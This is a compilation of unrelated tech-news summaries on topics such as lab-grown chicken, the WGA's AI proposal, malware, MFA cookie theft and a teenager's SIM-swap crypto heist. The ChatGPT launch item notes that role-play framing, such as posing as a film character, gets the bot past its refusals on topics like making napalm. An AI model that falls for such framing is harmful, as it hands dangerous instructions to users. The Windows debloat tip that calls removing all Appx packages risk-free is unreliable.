An anonymous reader quotes a report from CBS News: The Food and Drug Administration on Monday cleared cultured "cultured chicken cell material" made by GOOD Meat as safe for use as human food. While the FDA said the lab-grown chicken was safe to eat, GOOD Meat still needs approval from the Agriculture Department before i can sell the product in the U.S. If approved, acclaimed chef Jose Andres plans to serve GOOD Meat's chicken to customers at his Washington, D.C. restaurant. He's on GOOD Meat's board of directors.

The FDA previously gave the green light to lab-grown chicken made by Upside Foods in November. Upside Foods and GOOD Meat both use cells from chickens to create the cultured chicken products. Once cells are extracted, GOOD Meat picks the cells most likely to produce healthy, sustainable and tasty meat, the company explained. The cells are immersed in nutrients inside a tank. They grow and divide, creating the cultured chicken, which can be harvested after four to six weeks. GOOD Meat's chicken is already sold in Singapore. "Today's news is more than just another regulatory decision -- it's food system transformation in action," says Bruce Friedrich, president and founder of the Good Food Institute, a non-profit think tank that focuses on alternatives to traditional meat production.

"Consumers and future generations deserve the foods they love made more sustainably and in ways that benefit the public good -- ways that preserve our land and water, ways that protect our climate and global health," Friedrich says.

The Writers Guild of America has proposed allowing artificial intelligence to write scripts, as long as it does not affect writers' credits or residuals. Variety reports: The guild had previously indicated that it would propose regulating the use of AI in the writing process, which has recently surfaced as a concern for writers who fear losing out on jobs. But contrary to some expectations, the guild is not proposing an outright ban on the use of AI technology. Instead, the proposal would allow a writer to use ChatGPT to help write a script without having to share writing credit or divide residuals. Or, a studio executive could hand the writer an AI-generated script to rewrite or polish and the writer would still be considered the first writer on the project.

In effect, the proposal would treat AI as a tool -- like Final Draft or a pencil -- rather than as a writer. It appears to be intended to allow writers to benefit from the technology without getting dragged into credit arbitrations with software manufacturers. The proposal does not address the scenario in which an AI program writes a script entirely on its own, without help from a person. The guild's proposal was discussed in the first bargaining session on Monday with the Alliance of Motion Picture and Television Producers. Three sources confirmed the proposal. It's not yet clear whether the AMPTP, which represents the studios, will be receptive to the idea. The WGA proposal states simply that AI-generated material will not be considered "literary material" or "source material." Those terms are key for assigning writing credits, which in turn have a big impact on residual compensation.

"Literary material" is a fundamental term in the WGA's minimum basic agreement -- it is what a "writer" produces (including stories, treatments, screenplays, dialogue, sketches, etc.). If an AI program cannot produce "literary material," then it cannot be considered a "writer" on a project. "Source material" refers to things like novels, plays and magazine articles, on which a screenplay may be based. If a screenplay is based on source material, then it is not considered an "original screenplay." The writer may also get only a "screenplay by" credit, rather than a "written by" credit. A "written by" credit entitles the writer to the full residual for the project, while a "screenplay by" credit gets 75%. By declaring that ChatGPT cannot write "source material," the guild would be saying that a writer could adapt an AI-written short story and still get full "written by" credit.

Online counseling company BetterHelp has agreed to pay $7.8 million to settle charges from the Federal Trade Commission that it improperly shared customers' sensitive data with companies like Facebook and Snapchat, even after promising to keep it private. The Verge reports: The proposed order, announced by the FTC on Thursday, would ban the same behavior in the future and require BetterHelp to make some changes to how it handles customer data. According to the regulator, the sign-up process for the company's service "promised consumers that it would not use or disclose their personal health data except for limited purposes." However, the FTC alleges that the company instead "used and revealed consumers' email addresses, IP addresses, and health questionnaire information to Facebook, Snapchat, Criteo, and Pinterest for advertising purposes."

The FTC also says that the company gave customer service agents false scripts to try and reassure users that it wasn't sharing personally identifiable or personal health information after a February 2020 report from Jezebel exposed some of its practices. The commission's complaint (PDF) accuses the company of misleading customers by putting a HIPAA seal on its website, despite the fact that "no government agency or other third party reviewed [BetterHelp]'s information practices for compliance with HIPAA, let alone determined that the practices met the requirements of HIPAA."

If the FTC's order ends up going through, the $7.8 million would go to customers who signed up for the service between August 1st, 2017, and December 31st, 2020. Here are some of the other things BetterHelp would be required to do:

- Stop sharing individually identifiable information about consumer's mental health with any third parties
- Stop misrepresenting its data collection and use policies
- Alert customers who created accounts before January 1st, 2021, that their personal info may have been used for advertising
- Obtain "affirmative express consent" from a customer before sharing information with a third party
- Reach out to third parties that received customer information and ask that it be deleted
- Establish a "comprehensive privacy program" and have an independent third party carry out privacy assessments

Amazon is developing a TV series based on the Tomb Raider video game franchise with scripts written by Phoebe Waller-Bridge, according to The Hollywood Reporter. The Verge reports: Details are light on this new Tomb Raider series, but THR says that while Waller-Bridge will serve as a writer and executive producer, she won't be starring in the show. The show is apparently still in the development stages, so we probably shouldn't expect to see it anytime soon. This new series could be another potentially big video game franchise adaptation for Amazon, which announced in December that it would be making a God of War TV show. But it also marks a further investment from Amazon into the Tomb Raider franchise, as the company will also be publishing the next Tomb Raider game from Crystal Dynamics. Amazon didn't immediately reply to a request for comment.

An anonymous reader writes: Recently, I had to set up a Windows 10 computer for one specific application in a semi-embedded use case. Anything else that Windows does or comes with is unnecessary for this. While there are plenty of internet scripts and apps for de-bloating Windows, I have found the easiest (and little known) way to debloat Windows without running any internet scripts is as follows:

1. Open Powershell.
2. Type Get-AppxPackage | Remove-AppxPackage.
3. Ignore any error messages about packages that can't be removed, it's fine.

Will this work for everyone? No, of course not, but it's a great one-line, easily memorable tool for cleaning up a PC quickly for an industrial use case without any security risks.

While "this proposal will only be implemented if approved by the Fedora Engineering Steering Committee," Phoronix reports: Red Hat and Fedora engineers are plotting a path to supporting Unified Kernel Images (UKI) with Fedora Linux and for the Fedora 38 release in the spring they are aiming to get their initial enablement in place.

Unified Kernel Images have been championed by the systemd folks for better securing and trusting Linux distributions. Unified kernel images are a combination of the kernel image, initrd, and UEFI stub program all distributed as one.... The initial phase would focus on shipping a UKI as an optional sub-RPM that users can opt into initially, updating kernel install scripts so unified kernels are installed and properly updated, and bootloader support for unified kernel images. Adding systemd-boot support to the installers, better measurement and remote attestation support, and switching Fedora Cloud images to using unified kernels are among the additional goals but of lower priority.
Fedora's wiki includes a detailed description of the change proposal: The goal is to move away from initrd images being generated on the installed machine. They are generated while building the kernel package instead, then shipped as part of a unified kernel image. A unified kernel image is an all-in-one efi binary containing kernel, initrd, cmdline and signature....

Main motivation for this move is to make the distro more robust and more secure.

An anonymous reader quotes a report from Ars Technica: One of the Kremlin's most active hacking groups targeting Ukraine recently tried to hack a large petroleum refining company located in a NATO country. The attack is a sign that the group is expanding its intelligence gathering as Russia's invasion of its neighboring country continues. The attempted hacking occurred on August 30 and was unsuccessful, researchers with Palo Alto Networks' Unit 42 said on Tuesday. The hacking group -- tracked under various names including Trident Ursa, Gamaredon, UAC-0010, Primitive Bear, and Shuckworm -- has been attributed by Ukraine's Security Service to Russia's Federal Security Service.

In the past 10 months, Unit 42 has mapped more than 500 new domains and 200 samples and other bread crumbs Trident Ursa has left behind in spear phishing campaigns attempting to infect targets with information-stealing malware. The group mostly uses emails with Ukrainian-language lures. More recently, however, some samples show that the group has also begun using English-language lures. "We assess that these samples indicate that Trident Ursa is attempting to boost their intelligence collection and network access against Ukrainian and NATO allies," company researchers wrote. Among the filenames used in the unsuccessful attack were: MilitaryassistanceofUkraine.htm, Necessary_military_assistance.rar, and List of necessary things for the provision of military humanitarian assistance to Ukraine.lnk. Tuesday's report didn't name the targeted petroleum company or the country where the facility was located. In recent months, Western-aligned officials have issued warnings that the Kremlin has set its sights on energy companies in countries opposing Russia's war on Ukraine.

Trident Ursa's hacking techniques are simple but effective. The group uses multiple ways to conceal the IP addresses and other signatures of its infrastructure, phishing documents with low detection rates among anti-phishing services, and malicious HTML and Word documents. Unit 42 researchers wrote: "Trident Ursa remains an agile and adaptive APT that does not use overly sophisticated or complex techniques in its operations. In most cases, they rely on publicly available tools and scripts -- along with a significant amount of obfuscation -- as well as routine phishing attempts to successfully execute their operations..." Tuesday's report provides a list of cryptographic hashes and other indicators organizations can use to determine if Trident Ursa has targeted them. It also provides suggestions for ways to protect organizations against the group.

Alphabet's DeepMind has built an AI tool that can help generate rough film and stage scripts Engadget's Kris Holt reports: Dramatron is a so-called "co-writing" tool that can generate character descriptions, plot points, location descriptions and dialogue. The idea is that human writers will be able to compile, edit and rewrite what Dramatron comes up with into a proper script. Think of it like ChatGPT, but with output that you can edit into a blockbuster movie script. To get started, you'll need an OpenAI API key and, if you want to reduce the risk of Dramatron outputting "offensive text," a Perspective API key. To test out Dramatron, I fed in the log line for a movie idea I had when I was around 15 that definitely would have been a hit if Kick-Ass didn't beat me to the punch. Dramatron quickly whipped up a title that made sense, and character, scene and setting descriptions. The dialogue that the AI generated was logical but trite and on the nose. Otherwise, it was almost as if Dramatron pulled the descriptions straight out of my head, including one for a scene that I didn't touch on in the log line.

Playwrights seemed to agree, according to a paper (PDF) that the team behind Dramatron presented today. To test the tool, the researchers brought in 15 playwrights and screenwriters to co-write scripts. According to the paper, playwrights said they wouldn't use the tool to craft a complete play and found that the AI's output can be formulaic. However, they suggested Dramatron would be useful for world building or to help them explore other approaches in terms of changing plot elements or characters. They noted that the AI could be handy for "creative idea generation" too. That said, a playwright staged four plays that used "heavily edited and rewritten scripts" they wrote with the help of Dramatron. DeepMind said that in the performance, experienced actors with improv skills "gave meaning to Dramatron scripts through acting and interpretation."

OpenAI has released a prototype general purpose chatbot that demonstrates a fascinating array of new capabilities but also shows off weaknesses familiar to the fast-moving field of text-generation AI. And you can test out the model for yourself right here. The Verge reports: ChatGPT is adapted from OpenAI's GPT-3.5 model but trained to provide more conversational answers. While GPT-3 in its original form simply predicts what text follows any given string of words, ChatGPT tries to engage with users' queries in a more human-like fashion. As you can see in the examples below, the results are often strikingly fluid, and ChatGPT is capable of engaging with a huge range of topics, demonstrating big improvements to chatbots seen even a few years ago. But the software also fails in a manner similar to other AI chatbots, with the bot often confidently presenting false or invented information as fact. As some AI researchers explain it, this is because such chatbots are essentially "stochastic parrots" -- that is, their knowledge is derived only from statistical regularities in their training data, rather than any human-like understanding of the world as a complex and abstract system. [...]

Enough preamble, though: what can this thing actually do? Well, plenty of people have been testing it out with coding questions and claiming its answers are perfect. ChatGPT can also apparently write some pretty uneven TV scripts, even combining actors from different sitcoms. It can explain various scientific concepts. And it can write basic academic essays. And the bot can combine its fields of knowledge in all sorts of interesting ways. So, for example, you can ask it to debug a string of code ... like a pirate, for which its response starts: "Arr, ye scurvy landlubber! Ye be makin' a grave mistake with that loop condition ye be usin'!" Or get it to explain bubble sort algorithms like a wise guy gangster. ChatGPT also has a fantastic ability to answer basic trivia questions, though examples of this are so boring I won't paste any in here. And someone else saying the code ChatGPT provides in the very answer above is garbage.

I'm not a programmer myself, so I won't make a judgment on this specific case, but there are plenty of examples of ChatGPT confidently asserting obviously false information. Here's computational biology professor Carl Bergstrom asking the bot to write a Wikipedia entry about his life, for example, which ChatGPT does with aplomb -- while including several entirely false biographical details. Another interesting set of flaws comes when users try to get the bot to ignore its safety training. If you ask ChatGPT about certain dangerous subjects, like how to plan the perfect murder or make napalm at home, the system will explain why it can't tell you the answer. (For example, "I'm sorry, but it is not safe or appropriate to make napalm, which is a highly flammable and dangerous substance.") But, you can get the bot to produce this sort of dangerous information with certain tricks, like pretending it's a character in a film or that it's writing a script on how AI models shouldn't respond to these sorts of questions.

An anonymous reader quotes a report from NPR: The FDA has confirmed the nation is experiencing a shortage of Adderall after many pharmacies around the country have been unable to fill prescriptions and keep up with demand. The drug, which is also known as mixed amphetamine salts, is used to treat attention-deficit/hyperactivity disorder (ADHD) and narcolepsy. "We will continue to monitor supply and assist manufacturers with anything needed to resolve the shortage and will update our website with new supply information as it becomes available," the FDA said.

Expected recovery times for manufacturers' supplies of the prescription vary. Teva Pharmaceuticals, which sells the most Adderall in the U.S., has a 10 mg dosage of Adderall that is expected to rebound in October. But many of its generic brand offerings aren't expected to recover until March 2023. Manufacturer SpecGX's higher doses won't recoup until January 2023, while Rhodes Pharmaceuticals has a shortage of an active ingredient. Bloomberg health reporter Ike Swetlitz told NPR last month the shortages began due to a labor shortage at Teva, causing production delays that began showing up at other companies. Additionally, an increase in ADHD diagnoses has been driving up demand for Adderall in recent years.

"This Monday, the first set of patches to enable Rust support and tooling was merged for Linux 6.1," writes Slashdot reader sabian2008, sharing an update from longtime kernel developer Kees Cook: The tree has a recent base, but has fundamentally been in linux-next for a year and a half. It's been updated based on feedback from the Kernel Maintainer's Summit, and to gain recent Reviewed-by: tags. Miguel is the primary maintainer, with me helping where needed/wanted. Our plan is for the tree to switch to the standard non-rebasing practice once this initial infrastructure series lands. The contents are the absolute minimum to get Rust code building in the kernel, with many more interfaces[2] (and drivers -- NVMe[3], 9p[4], M1 GPU[5]) on the way.

The initial support of Rust-for-Linux comes in roughly 4 areas:
- Kernel internals (kallsyms expansion for Rust symbols, %pA format)
- Kbuild infrastructure (Rust build rules and support scripts)
- Rust crates and bindings for initial minimum viable build
- Rust kernel documentation and samples Further reading: Linux 6.0 Arrives With Support For Newer Chips, Core Fixes, and Oddities

The Central Intelligence Agency (CIA) is launching a podcast called "The Langley Files." As the agency explains, "The mission of 'The Langley Files: A CIA Podcast' is to educate and connect with the general public, sharing insight into the Agency's core mission, capabilities and agility as an intelligence leader... and to share some interesting stories along the way!" Variety reports: The podcast features suspenseful intro music and a narrator explaining that CIA will be "sharing what we can" with stories that go "beyond those of Hollywood scripts and shadowed whispers." CIA Director Bill Burns is the featured guest on Episode 1 of "The Langley Files." "We do usually operate in the shadows, out of sight and out of mind," Burns said in the premiere. However, he continued, "in our democracy, where trust in institutions is in such short supply... it's important to try to explain ourselves the best we can and to demystify a little bit of what we do."

According to Burns, one of the biggest misconceptions people have about the CIA stems from Hollywood's depictions of intelligence field agents. Many people think CIA is a "glamorous world" of "heroic individuals who drive fast cars and defuse bombs and solve world crises all on their own" -- a la Jason Bourne, James Bond and Jack Ryan. (Bond is a British spy, but you get the drift.) On the podcast, Burns shared that he drives a 2013 Subaru Outback "at posted speed limits." [...] The CIA says each episode of the podcast will be about 15-30 minutes long and will "feature our hosts leading conversations with a range of special guests." The series is distributed on major audio platforms including Apple Podcasts, Spotify, Google Podcasts, Amazon Music and Player.fm. "From all of us here at CIA -- we'll be seeing you," said one of the hosts before signing off the inaugural episode.

Here's a warning from the threat intelligence unit of AT&T Cybersecurity, AT&T Alien Labs: With a rise of nearly 650% in malware and ransomware for Linux this year, reaching an all-time high in the first half year of 2022, threat actors find servers, endpoints and IoT devices based on Linux operating systems more and more valuable and find new ways to deliver their malicious payloads. New malwares like BotenaGo and EnemyBot are examples of how malware writers rapidly incorporate recently discovered vulnerabilities to find new victims and increase their reach.
But they've discovered a new malware targetting Linux endpoints and IoT devices, stealthily "delivered in a multistage infection chain where each module responds to a part of the payload and downloads and executes the next one. An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist."

The Register summarizes their report: The malware was dubbed "Shikitega" for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to "mutate" its code to avoid detection. Shikitega alters its code each time it runs through one of several decoding loops that AT&T said each deliver multiple attacks, beginning with an ELF file that's just 370 bytes... AT&T didn't say how the initial infection occurs, but it did say Shikitega exploits two Linux vulnerabilities disclosed in 2021 to achieve its ultimate objective, which AT&T said appears to be the installation and execution of the XMRig cryptocurrency miner.

The final stage also establishes persistence, which Shikitega does by downloading and executing five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user using crontab, which it can also install if not available. Shikitega also uses cloud hosting solutions to store parts of its payload, which it further uses to obfuscate itself by contacting via IP address instead of domain name....>
>
Bottom line: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers keep security patches installed, keep EDR software up to date and make regular backups of essential systems.
Ars Technica reports: The ultimate objective of the malware isn't clear. It drops the XMRig software for mining the Monero cryptocurrency, so stealthy cryptojacking is one possibility. But Shikitega also downloads and executes a powerful Metasploit package known as Mettle, which bundles capabilities including webcam control, credential stealing, and multiple reverse shells into a package that runs on everything from "the smallest embedded Linux targets to big iron." Mettle's inclusion leaves open the potential that surreptitious Monero mining isn't the sole function....

Given the work the unknown threat actors responsible devoted to the malware's stealth, it wouldn't be surprising if the malware is lurking undetected on some systems.

A survey this year by Equity, the UK union for actors and other performing arts workers, found that 65 per cent of members thought AI posed a threat to employment opportunities in the sector, rising to 93 per cent of audio artists. This wasn't just an amorphous fear about the future: more than a third of members had seen job listings for work involving AI and almost a fifth had undertaken some of this work. From a report: A range of AI start-ups are developing tools for use in film and audio, from making actors look and sound younger to creating AI voices that can be used for marketing campaigns, consumer assistants or even audiobook narration. Audio is such a popular medium now that companies need lots of it, but human actors are expensive and nowhere near as flexible as an AI voice, which can be made to say anything at the push of a button. These companies typically hire actors to provide hours' worth of audio which can then be turned into a voice-for-hire.

VocaliD, for example, offers a range of voices such as "Malik" ("warm, soothing, urban") "Terri" ("educated, optimistic, sophisticated") and "AI Very British Voice" ("trustworthy, warm, calm.") Sonantic, another AI company which was just acquired by Spotify, creates voices that can laugh, shout or cry. Its voices are often used by video game companies in the production process so they can play around with different scripts. They're not as good as humans, but they don't need to be. Industry experts say no one is going to use AI to narrate the audiobook of a bestselling novel, but there is still a market to be tapped in the vast number of lower-profile books that are published or self-published every year. Audiobook.ai, for example, says it can create an audiobook in 10 minutes with 146 voices to choose from in 43 languages.

Slashdot reader storagedude writes: Hackers are stealing cookies from current or recent web sessions to bypass multi-factor authentication (MFA), according to an eSecurity Planet report.

The attack method, reported by Sophos researchers, is already growing in use. The "cookie-stealing cybercrime spectrum" is broad, the researchers wrote, ranging from "entry-level criminals" to advanced adversaries, using various techniques.

Cybercriminals collect cookies or buy stolen credentials "in bulk" on dark web forums. Ransomware groups also harvest cookies and "their activities may not be detected by simple anti-malware defenses because of their abuse of legitimate executables, both already present and brought along as tools," the researchers wrote.

Browsers allow users to maintain authentication, remember passwords and autofill forms. That might seem convenient, but attackers can exploit this functionality to steal credentials and skip the login challenge.

Behind the scenes, browsers use SQLite database files that contain cookies. These cookies are composed of key-value pairs, and the values often contain critical information such as tokens and expiration dates.

Adversaries know the exact name and location of these files for all major browsers such as Chrome, Firefox, and even Brave, on various operating systems. That's why the attack can be scripted. It's not uncommon to find such scripts along with other modules in info-stealing and other malware.

For example, the latest version of the Emotet botnet targets cookies and credentials stored by browsers, which include saved credit cards. According to the Sophos researchers, "Google's Chrome browser uses the same encryption method to store both multi-factor authentication cookies and credit card data."

To gain initial access, attackers can also perform phishing and spear-phishing campaigns to implant droppers that can deploy cookie-stealer malware stealthily.

The cookies are then used for post-exploitation and lateral movements. Cybercriminals can use them to change passwords and emails associated with user accounts, or trick the victims into downloading additional malware, or even deploy other exploitation tools such as Cobalt Strike and Impacket kit.

Users should not use built-in features to save passwords unless the browser encrypts them with, at least, a master password. It's recommended that users uncheck the setting called "remember passwords," and users should probably not allow persistent sessions as well.

Developers can be part of the problem if they don't secure authentication cookies properly. Such cookies must have a short expiration date. Otherwise, the persistent authentication could turn into a persistent threat. You can have great security processes and still get hacked because the cookies do not have the necessary flags (e.g., HttpOnly, Secure attribute). For example, authentication cookies must be sent using SSL/TLS channels. Otherwise the data could be sent in plain text and attackers would only have to sniff traffic to intercept credentials.

It turns out that JavaScript had a hand in delivering the stunning images that the James Webb Space Telescope has been beaming back to Earth. From a report: I mean that the actual telescope, arguably one of humanity's finest scientific achievements, is largely controlled by JavaScript files. Oh, and it's based on a software development kit from 2002. According to a manuscript (PDF) for the JWST's Integrated Science Instrument Module (or ISIM), the software for the ISIM is controlled by "the Script Processor Task (SP), which runs scripts written in JavaScript upon receiving a command to do so." The actual code in charge of turning those JavaScripts (NASA's phrasing, not mine) into actions can run 10 of them at once.

The manuscript and the paper (PDF) "JWST: Maximizing efficiency and minimizing ground systems," written by the Space Telescope Science Institute's Ilana Dashevsky and Vicki Balzano, describe this process in great detail, but I'll oversimplify a bit to save you the pages of reading. The JWST has a bunch of these pre-written scripts for doing specific tasks, and scientists on the ground can tell it to run those tasks. When they do, those JavaScripts will be interpreted by a program called the script processor, which will then reach out to the other applications and systems that it needs to based on what the script calls for. The JWST isn't running a web browser where JavaScript directly controls the Mid-Infrared Instrument -- it's more like when a manager is given a list of tasks (in this example, the JavaScripts) to do and delegates them out to their team.

After a revelation in May that DuckDuckGo's (DDG) privacy-focused web browser allows Microsoft tracking scripts on third-party websites, the company now says it will start blocking those too. From a report: DuckDuckGo's browser had third-party tracker loading protection by default that already blocked scripts embedded on websites from Facebook, Google, and others, but until now Microsoft's scripts from the Bing and LinkedIn domains (but not its third-party cookies) had a pass.

A security researcher named Zach Edwards pointed out the exclusion that he apparently uncovered while auditing the browser's privacy claims, and noted it is especially curious because Microsoft is the partner that delivers ads in DDG's search engine (while promising not to use that data to create a monitored profile of users to target ads, instead relying on context to decide which ones it should show). DuckDuckGo CEO Gabe Weinberg said at the time that the reason for it was a search syndication agreement with Microsoft, and that more updates on third-party tracker preventions were coming. A backlash ensued, with some seizing on DuckDuckGo's own words that "tracking is tracking," a phrase the company used against Google's cookie-replacing "privacy sandbox" ad technology. Now Weinberg writes in a blog post, "I've heard from a number of users and understand that we didn't meet their expectations around one of our browser's web tracking protections." DuckDuckGo is vowing to be more transparent about what trackers its browser and extensions are protecting users from, making its tracker blocklists available and offering users more information on how its tracking protections with a new help page.

Bun is "a modern JavaScript runtime like Node or Deno," according to its newly-launched web site, "built from scratch to focus on three main things."

- Start fast (it has the edge in mind).
- New levels of performance (extending JavaScriptCore, the engine).
- Being a great and complete tool (bundler, transpiler, package manager).

Bun is designed as a drop-in replacement for your current JavaScript & TypeScript apps or scripts — on your local computer, server or on the edge. Bun natively implements hundreds of Node.js and Web APIs, including ~90% of Node-API functions (native modules), fs, path, Buffer and more. [And Bun also implements Node.js' module resolution algorithm, so you can use npm packages in bun.js]

The goal of Bun is to run most of the world's JavaScript outside of browsers, bringing performance and complexity enhancements to your future infrastructure, as well as developer productivity through better, simpler tooling.... Why is Bun fast? An enormous amount of time spent profiling, benchmarking and optimizing things. The answer is different for every part of Bun, but one general theme: [it's written in Zig.] Zig's low-level control over memory and lack of hidden control flow makes it much simpler to write fast software.
An infographic on the site claims its server-side rendering of React is more than three times faster than Node or Deno. And Bun.js can even automatically load environment variables from .env files, according to the site. No more require("dotenv").load()
Hackaday describes it as "a performant all-in-one approach," including "bundling, transpiling, module resolution, and a fantastic foreign-function interface." Many Javascript projects have a bundling and transpiling step that takes the source and packages it together in a more standard format. Typescript needs to be packaged into javascript, and modules need to be resolved. Bun bakes all this in. Typescript and JSX "just work." This dramatically simplifies many projects as much of the build infrastructure is part of Bun itself, lowering cognitive load when trying to understand a project... Some web-specific APIs, such as fetch and Websockets, are also built-in.
"What's even wilder is that Bun is written by one person, Jared Sumner," the article points out — adding that the all the code is available on GitHub under the MIT License ("excluding dependencies which have various licenses.")

15-year-old Ellis Pinsky stole $23.8 million worth of cryptocurrency — and his life was never the same. For example, Rolling Stone reports, in his last year of high school, "Four men wearing ski masks and gloves, armed with knives, rope, brass knuckles, and a fake 9 mm," crept around the back of his home in the suburbs: Two weeks before the break-in, a lawsuit had been filed against him, and news stories had circulated connecting him to the hack. He knew that the thieves wanted this money, the millions and millions of dollars he had stolen. He also knew that he couldn't give it to them. He didn't have it. Not anymore.
The magazine paints the portrait of "an anxious young man in Invisalign braces" who describes the revelation he'd had at the age of 13. "The internet held such secrets. All he had to do was uncover them." As he soon found, there were plenty of people working to uncover them all the time, and willing to share their methods — for a price.... Realizing that a lot of the information social engineers used came from hacked databases, he began teaching himself to program, particularly to do the Structured Query Language injections and cross-site scripting that allowed him to attack companies' database architecture. The terabyte upon terabyte of databases he extracted, traded, and hoarded made him valuable to OGUsers as well as to others, like the Russian hackers he was able to converse with thanks to his fluency with his mother's native language... By the time he was 14, he tells me, "I think it's fair to say I had the capabilities to hack anyone."
The article describes him as "attending high school by day and extracting the source code of major corporations by night.... He was 14 years old and taken with the thrill of possessing a hidden superpower, of spending his nights secretly tapping into an underground world where he was esteemed and even feared. And then, in the morning, being called downstairs to breakfast." He wrote a Python script to comb through social media networks and seek out any mentions of working for a [cellphone] carrier. Then he'd reach out with an offer of compensation for helping him with a task. Every fifth or sixth person — underpaid and often working a short-term contract — would say they were game, as Pinsky tells it. For a couple hundred dollars' worth of bitcoin, they'd be willing to do a SIM swap, no questions asked. Eventually, Pinsky says, he had employees at every major carrier also working for him. Then the stakes got even higher. It was only a matter of time before OG hackers, known to each other as "the Community," realized that if they could use the SIM-swapping method to steal usernames, they could just as easily use it to steal cryptocurrency...
In one massive heist Pinksky stole 10% of all the Trigger altcoins on the market from crypto impresario Michael Terpin. ("As Pinsky's money launderers were converting it, the market was crashing in real time.") Pinsky recruited a crew to launder the money — at least one of which simply kept it — but even with all the conversion fees, he still made off with millions. And then... For a while, he half-expected the FBI to knock on his door at any moment, just like in the movies; but as time passed, he grew less anxious.... He says he moved on to learning different types of programming. He ran a sneaker business that used bots and scripts to snap up limited pairs then flip them... He went to soccer practice. He and his friends had started hanging out with girls on the weekend, driving down to the docks where you could see the glowing lights from the Tappan Zee Bridge.
Until Terpin figured out it was Pinsky who'd robbed him: Pinsky and his legal team preempted his arrest by contacting the U.S. attorney directly and offering his cooperation. In February 2020, he voluntarily returned every last thing he says he got from the Terpin heist: 562 bitcoins, the Patek watch, and the cash he'd stored in the safe under his bed.... When I ask if he has also worked with the FBI to help bring down other hackers, he blinks quickly and then changes the subject.
Pinsky has not been criminally charged — partly because he was a minor, but also because of his cooperation with law enforcement. But filing a civil suit, Terpin wants to be compensated with triple the amount stolen, arguing that the teenager who robbed him was running an organized crime racket and that he should be heavily punished to set an example.

Rolling Stone's article raisees the question: what should happen next?

After many years of gradual improvement Vim now takes a big step with a major release. Besides many small additions the spotlight is on a new incarnation of the Vim script language: Vim9 script. Why Vim9 script: A new script language, what is that needed for? Vim script has been growing over time, while preserving backwards compatibility. That means bad choices from the past often can't be changed and compatibility with Vi restricts possible solutions. Execution is quite slow, each line is parsed every time it is executed.

The main goal of Vim9 script is to drastically improve performance. This is accomplished by compiling commands into instructions that can be efficiently executed. An increase in execution speed of 10 to 100 times can be expected. A secondary goal is to avoid Vim-specific constructs and get closer to commonly used programming languages, such as JavaScript, TypeScript and Java.

The performance improvements can only be achieved by not being 100% backwards compatible. For example, making function arguments available by creating an "a:" dictionary involves quite a lot of overhead. In a Vim9 function this dictionary is not available. Other differences are more subtle, such as how errors are handled. For those with a large collection of legacy scripts: Not to worry! They will keep working as before. There are no plans to drop support for legacy script. No drama like with the deprecation of Python 2.